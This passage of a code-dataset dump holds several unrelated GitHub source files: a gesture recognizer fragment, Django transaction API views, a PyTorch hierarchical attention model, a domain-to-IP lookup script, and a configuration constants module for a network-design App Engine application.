self.bounding_box_size ** 2 + self.bounding_box_size ** 2))\n        print(\"template: \", updated_template)\n        print(\"score: \", score)\n        return updated_template # , score\n\n    # golden-section search: the golden ratio narrows the angle interval\n    def distance_at_best_angle(self, points, template, angle_a, angle_b, angle_threshold):\n        golden_ratio = 0.5 * (-1 + np.sqrt(5))\n        x1 = golden_ratio * angle_a + (1 - golden_ratio) * angle_b\n        f1 = self.distance_at_angle(points, template, x1)\n        x2 = (1 - golden_ratio) * angle_a + golden_ratio * angle_b\n        f2 = self.distance_at_angle(points, template, x2)\n\n        while np.abs(angle_b - angle_a) > angle_threshold:\n            if f1 < f2:\n                angle_b = x2\n                x2 = x1\n                f2 = f1\n                x1 = golden_ratio * angle_a + (1 - golden_ratio) * angle_b\n                f1 = self.distance_at_angle(points, template, x1)\n            else:\n                angle_a = x1\n                x1 = x2\n                f1 = f2\n                x2 = (1 - golden_ratio) * angle_a + golden_ratio * angle_b\n                f2 = self.distance_at_angle(points, template, x2)\n        return min(f1, f2)\n\n    def distance_at_angle(self, points, template, angle):\n        new_points = self.rotate_by(points, angle)\n        d = self.path_distance(new_points, template)\n        return d\n\n    def path_distance(self, a, b):\n        d = 0\n        for i in range(len(a)):\n            d = d + self.calc_distance(a[i], b[i])\n        return d / len(a)\n","repo_name":"ITT-21SS-UR/assignment9-km-9","sub_path":"dollar_one_model.py","file_name":"dollar_one_model.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"15294533486","text":"from rest_framework.views import APIView\nfrom django.utils.decorators import method_decorator\nfrom rest_framework.response import Response\nfrom mastermind_api.utils.db import DbConnection\nfrom django.views.decorators.csrf import csrf_exempt\nfrom mastermind_api.utils.auth import 
AccessTokenRequire\nfrom django.core.exceptions import SuspiciousOperation\n\n@method_decorator([csrf_exempt, AccessTokenRequire], name=\"dispatch\")\nclass SetBalance(APIView):\n '''\n To take care of transaction handling debit/credit of amount from a specific account.\n It looks for three values (contact_number, amount,trantype) to make a transaction.\n '''\n def __init__(self):\n pass\n\n def post(self, request, **kwargs):\n response = {}\n try:\n if kwargs[\"is_validate\"] is True:\n parameters = []\n request_details = request.data\n\n if 'contact_number' in request_details:\n parameters.append(str(request_details['contact_number']))\n else:\n return Response(\"contact_number doesn't exist in request.\")\n\n if 'amount' in request_details:\n parameters.append(float(request_details['amount']))\n else:\n return Response(\"amount doesn't exist in request.\")\n\n if 'trantype' in request_details:\n parameters.append(request_details['trantype'])\n else:\n return Response(\"trantype doesn't exist in request.\") \n\n parameters.append('')\n db_conn = DbConnection()\n response = db_conn.execute_statement(proc_name= \"sp_set_balance\", commit= True, params = parameters)\n message,status = \"\",False\n\n if response.get_ErrorMessage():\n message = response.get_ErrorMessage()\n else:\n message = response.get_Params()[len(parameters)-1]\n status = True\n\n return Response({\"Message\":message,\"Data\":None,\"Status\":status})\n else:\n raise SuspiciousOperation(\"Access Token Require!!!!\")\n except Exception as error:\n raise SuspiciousOperation(\"Bad Request \" + str(error))\n \n@method_decorator([csrf_exempt,AccessTokenRequire],name=\"dispatch\")\nclass GetAllTransactions(APIView):\n '''\n To list all transaction on most recent first fashion. Request should have contact_number,offset\n and total_count parameters in request. 
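The `SetBalance` handler above reads `contact_number`, `amount`, and `trantype` from a JSON body, appends an empty output slot to the parameter list, and lets `sp_set_balance` write its message into that last slot. A minimal client-side sketch of calling it (the host, route path, and `Authorization` header format are hypothetical; the routing and the token scheme checked by `AccessTokenRequire` live outside this file):

```python
import requests

payload = {
    "contact_number": "9999999999",  # hypothetical account number
    "amount": 250.0,
    "trantype": "credit",            # or "debit"
}
resp = requests.post(
    "http://localhost:8000/api/setbalance/",     # hypothetical route
    json=payload,
    headers={"Authorization": "Token <token>"},  # hypothetical scheme
)
# Expected response shape per the handler:
# {"Message": ..., "Data": None, "Status": true/false}
print(resp.json())
```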
\n \n '''\n def __init__(self):\n pass\n\n def post(self, request, **kwargs): \n response = {}\n try:\n if kwargs[\"is_validate\"] is True: \n parameters = []\n request_details = request.data\n\n if 'contact_number' in request_details:\n parameters.append(request_details['contact_number'])\n else:\n return Response(\"contact_number doesn't exist in request.\")\n\n if 'offset' in request_details:\n parameters.append(request_details['offset'])\n else:\n return Response(\"offset doesn't exist in request.\")\n\n if 'total_count' in request_details:\n parameters.append(request_details['total_count'])\n else:\n return Response(\"total_count doesn't exist in request.\")\n\n parameters.append('')\n db_conn = DbConnection()\n response = db_conn.execute_statement(proc_name= \"sp_get_transaction_details\", commit= True, params = parameters)\n message, status, data = \"\", False, None\n\n if response.get_Data():\n data = response.get_Data()[0]\n status = True\n elif response.get_ErrorMessage():\n message = response.get_ErrorMessage()\n else:\n message = response.get_Params()[len(parameters)-1]\n\n return Response({\"Message\":message,\"Data\":data,\"Status\":status})\n else:\n raise SuspiciousOperation(\"Access Token Require!!!!\")\n except Exception as error:\n raise SuspiciousOperation(\"Bad Request \" + str(error)) ","repo_name":"pkmishra47/DjangoRestAPI","sub_path":"mastermind/mastermind_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14681977269","text":"## Basecode for this hAttention Network is taken from the following Github Repo:\n## https://github.com/SSinyu/Hierarchical-Attention-Networks\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport numpy as np\n#from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nclass AttentionLayer(nn.Module):\n def __init__(self, num_hid=100, bi=True):\n super(AttentionLayer, self).__init__()\n self.num_hid = num_hid\n self.linear_ = nn.Linear(self.num_hid, self.num_hid)\n self.tanh_ = nn.Tanh()\n self.softmax_ = nn.Softmax(dim=1)\n\n def forward(self, x):\n #print(\"x.shape: \", x.shape)\n u_context = torch.nn.Parameter(torch.FloatTensor(self.num_hid).normal_(0, 0.01)).cuda()\n h = self.tanh_(self.linear_(x)).cuda()\n sm = torch.mul(h, u_context)\n return sm, 0\n #print(\"sm.shape: \", sm.shape)\n alpha = self.softmax_(sm.sum(dim=0, keepdim=True)) # (x_dim0, x_dim1, 1)\n #print(\"alpha.shape: \", alpha.shape)\n attention_output = torch.mul(alpha, x).sum(dim=1) # (x_dim0, x_dim2)\n #print(\"attention_output.shape: \", attention_output.shape)\n return attention_output, alpha\n\n\nclass HierarchicalAttentionNet(nn.Module):\n def __init__(self, in_dim, num_hid, nlayers, bidirect, dropout, rnn_type='GRU'):\n super(HierarchicalAttentionNet, self).__init__()\n self.in_dim = in_dim\n self.num_hid = num_hid\n self.nlayers = nlayers\n self.rnn_type = rnn_type\n self.rnn = nn.LSTM if rnn_type == 'LSTM' else nn.GRU\n self.ndirections = 1 + int(bidirect)\n self.word_rnn = self.rnn(in_dim, num_hid, nlayers, dropout=dropout, bidirectional=bidirect, batch_first=True)\n self.word_att = AttentionLayer(num_hid, bidirect)\n\n def init_hidden(self, batch):\n # just to get the type of tensor\n weight = next(self.parameters()).data\n hid_shape = (self.nlayers * self.ndirections, batch, self.num_hid)\n if self.rnn_type == 'LSTM':\n return 
(Variable(weight.new(*hid_shape).zero_()),\n Variable(weight.new(*hid_shape).zero_()))\n else:\n return Variable(weight.new(*hid_shape).zero_())\n\n def forward(self, x):\n # x: [batch, sequence, in_dim]\n #print(\"x.shap: \", x.shape)\n batch = x.size(0)\n hidden = self.init_hidden(batch)\n self.word_rnn.flatten_parameters()\n output, hidden = self.word_rnn(x, hidden)\n #print(\"output.shape: \", output.shape)\n\n if self.ndirections == 1:\n #print(\"output.shape: \", output.shape)\n #print(\"output[:, -1].shape: \", output[:, -1].shape)\n attn, _ = self.word_att(output[:, -1])\n #print(\"attn.shape: \", attn.shape)\n return attn\n\n forward_ = output[:, -1, :self.num_hid]\n backward = output[:, 0, self.num_hid:]\n attn, _ = self.word_att((forward_, backward), dim=1)\n return attn\n\n def forward_all(self, x):\n # x: [batch, sequence, in_dim]\n batch = x.size(0)\n hidden = self.init_hidden(batch)\n self.word_rnn.flatten_parameters()\n output, hidden = self.word_rnn(x, hidden)\n attn, _ = self.word_att(output)\n return attn\n","repo_name":"Sanjeev2487/caption_guided_vqa","sub_path":"models/hAttention.py","file_name":"hAttention.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73996463731","text":"import socket\nimport sys\nimport time\ndef domain2ip(domains):\n for domain in domains:\n domain = domain.strip()\n try:\n ip = socket.gethostbyname(domain)\n except:\n ip = '127.0.0.1'\n print(ip,domain)\n\n\n\nif __name__ == '__main__':\n if sys.argv[1] == '--stdin':\n domains = sys.stdin.read().split(\"\\n\")\n domain2ip(domains)\n\n\n else:\n domain_file = sys.argv[1]\n domains = open(domain_file,'r').readlines()\n domain2ip(domains)\n\n \n\n","repo_name":"githubmaidou/tools","sub_path":"domain2ip.py","file_name":"domain2ip.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"21"} +{"seq_id":"10284801223","text":"import collections\nimport re\nimport string\n\n#\n# App identity settings.\n#\nAPP_IDENTITY_DEV = 'google.com:netdesign-dev'\nAPP_IDENTITY_TEST = 'google.com:netdesign-test'\nAPP_IDENTITY_DEMO = 'google.com:netdesign-demo'\nAPP_IDENTITY_STAGING = 'google.com:netdesign-staging'\nAPP_IDENTITY_PRODBACKUP = 'google.com:netdesign-prodbackup'\nAPP_IDENTITY_ACT = 'google.com:netdesign-act'\nAPP_IDENTITY_ACT2 = 'google.com:netdesign-act2'\nAPP_IDENTITY_PROD = 'google.com:netdesign'\nAPP_IDENTITY_ANT = 'google.com:netdesign-ant'\nAPP_IDENTITY_ANTBOM = 'google.com:netdesign-antbom'\nAPP_IDENTITY_TESTBED = 'testbed-test'\nAPP_IDENTITY_DEVAPPSERVER = 'auto'\nDEFAULT_MODULE_NAME = 'default'\nIMPORT_MODULE_NAME = 'importer'\n\n#\n# App Engine server map.\n#\nSERVERS = {\n 'local': ('localhost:9000', 'dev~auto'),\n 'dev': ('netdesign-dev.googleplex.com', 's~google.com:netdesign-dev'),\n 'test': ('netdesign-test.googleplex.com', 's~google.com:netdesign-test'),\n 'demo': ('netdesign-demo.googleplex.com', 's~google.com:netdesign-demo'),\n 'staging': ('netdesign-staging.googleplex.com',\n 's~google.com:netdesign-staging'),\n 'prodbackup': ('netdesign-prodbackup.googleplex.com',\n 's~google.com:netdesign-prodbackup'),\n 'act': ('netdesign-act.googleplex.com', 's~google.com:netdesign-act'),\n 'ant': ('netdesign-ant.googleplex.com', 's~google.com:netdesign-ant'),\n 'antbom': ('netdesign-antbom.googleplex.com',\n 's~google.com:netdesign-antbom'),\n 'act2': ('netdesign-act2.googleplex.com', 
's~google.com:netdesign-act2'),\n 'prod': ('netdesign.googleplex.com', 's~google.com:netdesign'),\n 'testbed': (None, None),\n}\n\n#\n# Tasks module related settings.\n#\nTASKS_MODULE_NAME = 'tasks'\n\n# Queue names.\nACT_QUEUE_NAME = 'act'\nBACKUP_QUEUE_NAME = 'backup'\nBATCH_QUEUE_NAME = 'batch'\nBOM_QUEUE_NAME = 'bom-jobs'\nDB_RESTORE_QUEUE_NAME = 'db-restore'\nFK_QUEUE_NAME = 'fks'\nEXTERNAL_QUEUE_NAME = 'external'\nEXTERNAL_BAZOOKA_QUEUE_NAME = 'external-bazooka'\nEXTERNAL_HARDWARE_QUEUE_NAME = 'external-hardware'\nEXTERNAL_TRAFFIC_QUEUE_NAME = 'external-traffic'\nEXTERNAL_NCSYNC_QUEUE_NAME = 'external-ncsync'\nHISTORY_QUEUE_NAME = 'history'\nIMPORTER_QUEUE_NAME = 'importer'\nTASKS_QUEUE_NAME = TASKS_MODULE_NAME\nUNM_EXPORT_QUEUE_NAME = 'unm-export'\nUNM_UPDATE_QUEUE_NAME = 'unm-update'\n\n# The base application module. Used for relative imports.\nBASE_MODULE = '_base'\n\n# Constants for metadata.\nMETADATA_BACKUP = 'backup'\nMETADATA_UPDATE_SEARCH = 'update_search'\n\n# A list of modules to search for Models (relative to BASE_MODULE). The order\n# of the modules is not maintained, and every Model should have a unique name.\nMODEL_MODULES = ()\n# MODEL_MODULES = (\n# '.admin.admin_models',\n# '.bigquery.bigquery_models',\n# '.capacity.capacity_models',\n# '.bom.bom_item_models',\n# '.bom.bom_models',\n# '.btp.btp_models',\n# '.cables.cable_models',\n# '.circuits.circuit_models',\n# '.circuits.circuit_element_models',\n# '.circuits.subcircuits.sub_circuit_models',\n# '.common.common_models',\n# '.capacity.activities_models',\n# '.devices.device_models',\n# '.devices.logical_device_models',\n# '.devices.splice_models',\n# '.email.email_models',\n# '.fallout.fallout_models',\n# '.file_attachments.file_attachments_models',\n# '.hardware.hardware_models',\n# '.history.history_models',\n# '.importer.importer_models',\n# '.locations.building.building_models',\n# '.locations.floor.floor_models',\n# '.locations.inventory.inventory_location_models',\n# '.locations.osp_container.osp_container_models',\n# '.locations.space.space_models',\n# '.locations.subbuilding.subbuilding_models',\n# '.locations.location_models',\n# '.logical_locations.logical_location_models',\n# '.logs.logs_models',\n# '.manufacturers.manufacturer_models',\n# '.metadata.metadata_models',\n# '.mutex.mutex_models',\n# '.netcracker.netcracker_models',\n# '.on_network_inventory_mapping.on_network_inventory_mapping_models',\n# '.optical_span.optical_span_models',\n# '.orders.order_item_models',\n# '.orders.order_models',\n# '.parts.part_models',\n# '.paths.path_models',\n# '.permissions.permission_models',\n# '.ports.port_status_models',\n# '.ports.reservation_models',\n# '.racks.rack_models',\n# '.recon.device_recon_models',\n# '.sequences.sequence_models',\n# '.sockets.socket_models',\n# '.traffic.traffic_models',\n# '.user.user_preference_models',\n# '.vcs.vcs_refs',\n# '.vendors.vendor_models',\n# '.transport.physical_spof.physical_spof_models',\n# '.transport.submarine_oms_ots.submarine_oms_ots_models',\n# '.transport.thirdparty_transport.thirdparty_transport_models',\n# '.transport.transport_models',\n# '.circuits.act_path_tx_models',\n# '.netcracker.bazooka_models',\n# '.cron.cron_models',)\n\n# Groups.\nDH_ADMIN_GROUP = '%doublehelix-admin'\nDH_DESIGN_GROUP = '%doublehelix-design'\nDH_RO_GROUP = '%doublehelix-ro'\nDH_RW_GROUP = '%doublehelix-rw'\nDH_SUPPLYCHAIN_GROUP = '%doublehelix-supplychain'\nDH_SUPPLYCHAIN_LOGISTICS_TVCS_GROUP = '%doublehelix-supplychain-logistics-tvcs'\nDH_SUPPLYCHAIN_PLANNER_TVCS_GROUP = 
'%doublehelix-supplychain-planner-tvcs'\nNETDESIGN_GROUP = '%netdesign'\n\n# Default model permissions.\n# Keep in sync with matching client constants.\nPERMISSIONS_DEFAULT_READ = [\n DH_ADMIN_GROUP,\n DH_DESIGN_GROUP,\n DH_RO_GROUP,\n DH_RW_GROUP,\n DH_SUPPLYCHAIN_GROUP,\n NETDESIGN_GROUP,\n]\n\nPERMISSIONS_DEFAULT_WRITE = [\n DH_ADMIN_GROUP,\n DH_DESIGN_GROUP,\n DH_RW_GROUP,\n DH_SUPPLYCHAIN_GROUP,\n NETDESIGN_GROUP,\n]\n\n# The processes which can update the model permissions\nADMIN_SCREEN = 'Admin screen'\nPERMISSIONS_YAML_UPLOAD = 'Permissions yaml upload'\nMETADATA_UPDATES = 'Metadata updates'\n\n# The environments label\nENV_PROD = 'prod'\nENV_STAGING = 'staging'\nENV_PRODBACKUP = 'prodbackup'\n\n# TODO(logant@) Put all DH application settings constants here.\n# Application setting constants\nDH_SETTING_BTP_ERROR_NOTIFY_ADDRESS = 'BTP_ERROR_NOTIFY_ADDRESS'\n\n# Constants for SpaceContents/Rack View Generation.\nDEEP_DEVICE_PERCENT = 0.75\nDEFAULT_RU_TOLERANCE = 0.15\n\n# Constants for GeoSpatial/Map View objects.\nGEOCODING_SCOPE = 'https://www.googleapis.com/auth/orgstore'\nGEOCODING_URI = 'http://maps.googleapis.com/maps/api/geocode/json?sensor=false'\n\n# Constants used in rack/device templates.\nDL_CODE_INSTANCE = 'INSTANCE'\nDL_CODE_TEMPLATE = 'TEMPLATE'\nTEMPLATE_KEY_NAME = 'template_key_name'\n\n# ACL file.\nACL_FILE = 'authz.yaml'\nSERVER_BASE_PATH = 'google3/ops/netdeploy/netdesign/server'\n# The value of SERVER_PATH changes for tests.\nSERVER_PATH = SERVER_BASE_PATH\n\n# Bundle file names.\nRIBBON_FILENAME = 'ribbon.yaml'\nMETADATA_FILE_END = '_metadata.yaml'\nMETADATA_FILE_LIST = 'metadata_file_list.yaml'\nUNMANAGED_FILE_LIST = 'training/data/unmanaged_file_list.yaml'\n\n# BigQuery query related settings.\nBIGQUERY_CATALOG = 'double_helix_tables'\nBIGQUERY_TABLEVIEW_KIND = 'BigQuery'\n# Increment this prefix anytime the content format changes.\nBIGQUERY_MEMCACHE_PREFIX = BIGQUERY_TABLEVIEW_KIND + 'V2:'\nBIGQUERY_MEMCACHE_TIMEOUT = 60 * 60 # 1 hour.\nBIGQUERY_MAX_MEMCACHE_TIMEOUT = 24 * 60 * 60 # 24 hours\nBIGQUERY_IMPORT_TABLE_PREFIX = 'bq_'\n\n# Project ID for BigQuery.\nBIGQUERY_PROJECT_ID_MAP = collections.defaultdict(\n lambda: APP_IDENTITY_TESTBED, # Default factory.\n **{\n APP_IDENTITY_DEV: APP_IDENTITY_DEV,\n APP_IDENTITY_TEST: APP_IDENTITY_TEST,\n APP_IDENTITY_DEMO: APP_IDENTITY_DEMO,\n APP_IDENTITY_STAGING: APP_IDENTITY_STAGING,\n APP_IDENTITY_PRODBACKUP: APP_IDENTITY_PRODBACKUP,\n APP_IDENTITY_ACT: APP_IDENTITY_ACT,\n APP_IDENTITY_ANT: APP_IDENTITY_ANT,\n APP_IDENTITY_ANTBOM: APP_IDENTITY_ANTBOM,\n APP_IDENTITY_ACT2: APP_IDENTITY_ACT2,\n APP_IDENTITY_PROD: 'google.com:googlenetdesign',\n })\n\n#\n# Google Cloud Storage related settings.\n#\n\nGS = 'gs'\nGS_ARCHIVE = '/archive/'\nGS_DELIMITER = '/'\nGS_BACKUP = 'BACKUP'\nGS_CSVIMPORT = 'CSVIMPORT'\nGS_DOWNLOADS = 'DOWNLOADS'\nGS_EXPORT = 'EXPORTS'\nGS_LEASEDINVENTORY = 'LEASEDINVENTORY'\n\n# Bucket name for cloud storage backup.\nGS_BACKUP_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixbackup_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixbackup',\n APP_IDENTITY_DEV: 'doublehelixbackup_dev',\n APP_IDENTITY_DEMO: 'doublehelixbackup_demo',\n APP_IDENTITY_TEST: 'doublehelixbackup_test',\n APP_IDENTITY_STAGING: 'doublehelixbackup_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixbackup_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixbackup_act',\n APP_IDENTITY_ACT2: 'doublehelixbackup_act2',\n APP_IDENTITY_ANT: 'doublehelixbackup_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixbackup_antbom',\n 
})\n\nGS_CSVIMPORT_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelix-csvimport-local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelix-csvimport',\n APP_IDENTITY_DEV: 'doublehelix-csvimport-dev',\n APP_IDENTITY_DEMO: 'doublehelix-csvimport-demo',\n APP_IDENTITY_TEST: 'doublehelix-csvimport-test',\n APP_IDENTITY_STAGING: 'doublehelix-csvimport-staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelix-csvimport-prodbackup',\n APP_IDENTITY_ACT: 'doublehelix-csvimport-act',\n APP_IDENTITY_ACT2: 'doublehelix-csvimport-act2',\n APP_IDENTITY_ANT: 'doublehelix-csvimport-ant',\n APP_IDENTITY_ANTBOM: 'doublehelix-csvimport-antbom',\n })\n\n# Cloud storage bucket location for cron job outputs.\nGS_DOWNLOADS_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixdownloads_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixdownloads',\n APP_IDENTITY_DEV: 'doublehelixdownloads_dev',\n APP_IDENTITY_DEMO: 'doublehelixdownloads_demo',\n APP_IDENTITY_TEST: 'doublehelixdownloads_test',\n APP_IDENTITY_STAGING: 'doublehelixdownloads_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixdownloads_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixdownloads_act',\n APP_IDENTITY_ACT2: 'doublehelixdownloads_act2',\n APP_IDENTITY_ANT: 'doublehelixdownloads_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixdownloads_antbom',\n })\n\n# Cloud storage bucket location for user triggered export/download items.\nGS_EXPORT_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixexport_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixexport',\n APP_IDENTITY_DEV: 'doublehelixexport_dev',\n APP_IDENTITY_DEMO: 'doublehelixexport_demo',\n APP_IDENTITY_TEST: 'doublehelixexport_test',\n APP_IDENTITY_STAGING: 'doublehelixexport_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixexport_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixexport_act',\n APP_IDENTITY_ACT2: 'doublehelixexport_act2',\n APP_IDENTITY_ANT: 'doublehelixexport_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixexport_antbom',\n })\n\nGS_EXPERIMENTAL_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixexperimental',\n **{\n APP_IDENTITY_PROD: 'doublehelixexperimental',\n })\n\nGS_LEASEDINVENTORY_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixleasedinventory_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixleasedinventory',\n APP_IDENTITY_DEV: 'doublehelixleasedinventory_dev',\n APP_IDENTITY_DEMO: 'doublehelixleasedinventory_demo',\n APP_IDENTITY_TEST: 'doublehelixleasedinventory_test',\n APP_IDENTITY_STAGING: 'doublehelixleasedinventory_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixleasedinventory_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixleasedinventory_act',\n APP_IDENTITY_ACT2: 'doublehelixleasedinventory_act2',\n APP_IDENTITY_ANT: 'doublehelixleasedinventory_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixleasedinventory_antbom',\n })\n\n# Bucket locations from which users can download files from UI.\nGS_REPORT_BUCKET_MAPS = (GS_DOWNLOADS_BUCKET_MAP,\n GS_EXPORT_BUCKET_MAP,\n GS_LEASEDINVENTORY_BUCKET_MAP)\n\nGS_BUCKET_MAPS = collections.defaultdict(\n lambda: GS_EXPERIMENTAL_BUCKET_MAP,\n **{\n GS_BACKUP: GS_BACKUP_BUCKET_MAP,\n GS_DOWNLOADS: GS_DOWNLOADS_BUCKET_MAP,\n GS_CSVIMPORT: GS_CSVIMPORT_BUCKET_MAP,\n GS_EXPORT: GS_EXPORT_BUCKET_MAP,\n GS_LEASEDINVENTORY: GS_LEASEDINVENTORY_BUCKET_MAP,\n })\n\nAPP_ID_BUCKET_SUFFIXES = {\n APP_IDENTITY_DEV: 'dev',\n APP_IDENTITY_TEST: 'test',\n APP_IDENTITY_DEMO: 'demo',\n APP_IDENTITY_PROD: 'prod',\n APP_IDENTITY_STAGING: 'staging',\n APP_IDENTITY_PRODBACKUP: 
'prodbackup',\n APP_IDENTITY_ACT: 'act',\n APP_IDENTITY_ACT2: 'act2',\n APP_IDENTITY_ANT: 'ant',\n APP_IDENTITY_ANTBOM: 'antbom',\n APP_IDENTITY_TESTBED: 'testbed-test',\n # For file attachments on local devappserver.\n APP_IDENTITY_DEVAPPSERVER: 'auto',\n}\n\nATTACHMENTS_BUCKET_PREFIX = '/doublehelix-attachments-'\n\n#\n# Foreign Key related settings.\n#\n# Value propagated when parent entity doesn't exist.\nFK_ERROR_VALUE = '[none]'\n# Value propagated when parent entity property doesn't exist.\nFK_MISSING_VALUE = None # Value\n# Limit for how many times we'll retry transactions.\nFK_TRANSACTION_RETRIES = 5\n# The number of transactions to run in parallel.\nFK_TRANSACTION_SIZE = 10\n# Fetch limit for entity queries.\nFK_BATCH_SIZE = FK_TRANSACTION_SIZE * 10\n# How many times to recurse when updating self-loops.\nFK_MAX_RECURSION = 10\n# Memcache key for foreign key references.\nFK_MEMCACHE_KEY = 'ForeignKeyReferences'\n# How long to cache foreign key references.\nFK_MEMCACHE_TIMEOUT = 60 * 30 # 30 minutes.\n\n# Fetch limit for materialized view mapper queries.\nMV_BATCH_SIZE = 1000\n\n# ASCII characters in the range 33 to 126 inclusive.\nVISIBLE_PRINTABLE_ASCII = frozenset(\n set(string.printable) - set(string.whitespace))\n\n# Boolean string alternatives.\nTRUE_VALUES = {'true', 'yes', 'y', '1'}\nFALSE_VALUES = {'false', 'no', 'n', '0'}\n\n# TableView related settings.\nTABLEVIEW_VALID_ALIASES = {'$key_kind', '$key_name'}\n\n# Base model constants.\nCREATED_BY = 'created_by'\nCREATED_ON = 'created_on'\nFK_DISPLAY = 'fk_display'\nNAME = 'name'\nNORMALIZED_NAME = 'normalized_name'\nUPDATED_BY = 'updated_by'\nUPDATED_ON = 'updated_on'\n\n# The model or the kind of an entity.\nMODEL = 'model'\n\n# The row number of a rack.\nRACK_ROW_NUMBER = 'row_number'\n\n# The position of a rack in the rack row.\nRACK_POSITION = 'position'\n\n# Rack max position.\nRACK_MAX_POSITION = 1000\n\nCOPY_DEVICES = 'copy_devices'\n\n# The cable key name in a strand.\nCABLE_KEY_NAME = 'Cable__key_name'\n\n# The net deploy part number of part.\nNDPN = 'ndpn'\n\n# The identifier of an entity.\nKEY_NAME = 'key_name'\n\n# The version number of an entity.\nKEY_VERSION = 'key_version'\n\n# The version number of an entity.\nKEY_SUBTYPE = 'key_subtype'\n\n# The default ordering number of an entity.\nKEY_ORDER = 'key_order'\n\n# The kind name of an entity.\nKEY_KIND = 'key_kind'\n\n# FK suffix.\nFK_KEY_NAME = KEY_NAME\nFK_SEP = '__'\n\n# START foreign key name and entity name constants for DH entities.\nBUILDING_KEY_NAME = 'Building__key_name'\nBUILDING_NAME = 'Building__name'\nDEVICES_KEY_NAME = 'Devices__Key_name'\nFLOOR_KEY_NAME = 'Floor__key_name'\nFLOOR_NAME = 'Floor__name'\nLOGICALDEVICE_KEY_NAME = 'LogicalDevice__key_name'\nLSOPTICS_KEY_NAME = 'LSOptics__key_name'\nMANUFACTURER_KEY_NAME = 'Manufacturer__key_name'\nMETRO_KEY_NAME = 'Metro__key_name'\nNETWORKELEMENT_KEY_NAME = 'NetworkElement__key_name'\nPART_KEY_NAME = 'Part__key_name'\nPOP_KEY_NAME = 'Pop__key_name'\nPOP_NAME = 'Pop__name'\nRACK_KEY_NAME = 'Rack__key_name'\nRACK_ROW_KEY_NAME = 'RackRow__key_name'\nSPACE_KEY_NAME = 'Space__key_name'\nSPACE_NAME = 'Space__name'\nVENDOR_KEY_NAME = 'Vendor__key_name'\n# END foreign key name and entity name constants for DH entities.\n\n# Represents the uuid of the direct parent of card/slot/port.\nPARENT_UUID = 'parent_uuid'\n\n# Represents the root parent of card/slot/port in device hierarchy.\nTOP_DEVICE_UUID = 'top_device_uuid'\nPORTS = 'ports'\nSLOTS = 'slots'\nCARDS = 'cards'\nCONNECTORS = 
'connectors'\nSUB_NODE_TYPES = (PORTS, SLOTS, CARDS, CONNECTORS)\n\n# Model names.\nMODEL_ACT_PATH_TX = 'ActPathTx'\nMODEL_BOM = 'BOM'\nMODEL_BOM_ITEM = 'BOMItem'\nMODEL_BUILDING = 'Building'\nMODEL_BUILDINGCONTENTS = 'BuildingContents'\nMODEL_BULK_FIBER_PANEL_CONNECTIONS_VIEW = 'BulkFiberPanelConnectionsView'\nMODEL_BTP_KIND = 'BtpKind'\nMODEL_BTP_SUMMARY = 'BtpSummary'\nMODEL_CABLE = 'Cable'\nMODEL_CAPACITY_FUNCTION = 'CapacityFunction'\nMODEL_CAPACITY_REFERENCE = 'CapacityReference'\nMODEL_CARD = 'Card'\nMODEL_CIRCUIT = 'Circuit'\nMODEL_CIRCUIT_ELEMENT = 'CircuitElement'\nMODEL_CONDUIT_CAPACITY = 'ConduitCapacity'\nMODEL_CIRCUIT_PATH = 'CircuitPath'\nMODEL_CONNECTION_POINT = 'ConnectionPoint'\nMODEL_CRON_ENTRY = 'CronEntry'\nMODEL_TRAFFIC_TIRESIAS_INPUT = 'TrafficTiresiasInput'\nMODEL_DEVICE = 'Device'\nMODEL_DEVICE_CONNECTIVITY_VIEW = 'DeviceConnectivityView'\nMODEL_EDGESPLICE = 'Splice'\nMODEL_FALLOUT = 'Fallout'\nMODEL_FILE_ATTACHMENT = 'FileAttachment'\nMODEL_FLOOR = 'Floor'\nMODEL_FLOORPLAN_CONTENTS = 'FloorplanContents'\nMODEL_HARDWARE_PARTS_MAPPING = 'HardwarePartsMapping'\nMODEL_INFRA_CAP = 'InfraCap'\nMODEL_INFRA_CAP_RULES = 'InfraCapRules'\nMODEL_INTERMETRO = 'InterMetro'\nMODEL_INVENTORY_LOCATION = 'InventoryLocation'\nMODEL_LEASED_WAVE_ROUTE = 'LeasedWaveRoute'\nMODEL_LEASED_WAVE_TO_ROUTE = 'LeasedWaveToRoute'\nMODEL_LIGHT_PATH = 'LightPath'\nMODEL_LOCALITY = 'Locality'\nMODEL_LOCATION = 'Location'\nMODEL_LOG = 'Log'\nMODEL_LOGICAL_DEVICES = 'LogicalDevice'\nMODEL_LOGICAL_LOCATION = 'LogicalLocation'\nMODEL_LSOPTICS = 